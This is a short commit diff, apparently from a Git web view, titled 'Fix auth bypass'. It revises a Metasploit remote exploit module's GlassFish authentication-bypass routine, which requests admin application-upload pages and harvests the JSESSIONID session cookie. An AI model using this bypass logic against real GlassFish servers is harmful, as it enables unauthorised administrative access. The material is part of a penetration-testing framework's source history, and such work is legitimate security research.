Fix auth bypass
parent
8e4fa80728
commit
c826785ebb
|
@ -631,20 +631,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def try_glassfish_auth_bypass(version)
|
||||
sid = false
|
||||
sid = nil
|
||||
|
||||
if version == '2.x' || version == '9.x'
|
||||
print_status("Trying auth bypass...")
|
||||
res = send_glassfish_request('/applications/upload.jsf', 'get')
|
||||
p = /<title>Deploy Enterprise Applications\/Modules/
|
||||
if res && res.code.to_i == 200 && res.body.match(p) != nil
|
||||
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
|
||||
title = '<title>Deploy Enterprise Applications/Modules</title>'
|
||||
if res && res.code.to_i == 200 && res.body.include?(title)
|
||||
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
|
||||
end
|
||||
else
|
||||
# 3.0
|
||||
print_status("Trying auth bypass...")
|
||||
res = send_glassfish_request('/common/applications/uploadFrame.jsf', 'get')
|
||||
p = /<title>Deploy Applications or Modules/
|
||||
if res && res.code.to_i == 200 && res.body.match(p) != nil
|
||||
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); /).flatten.first
|
||||
title = '<title>Deploy Applications or Modules'
|
||||
if res && res.code.to_i == 200 && res.body.include?(title)
|
||||
sid = res.get_cookies.to_s.scan(/JSESSIONID=(.*); */).flatten.first
|
||||
end
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue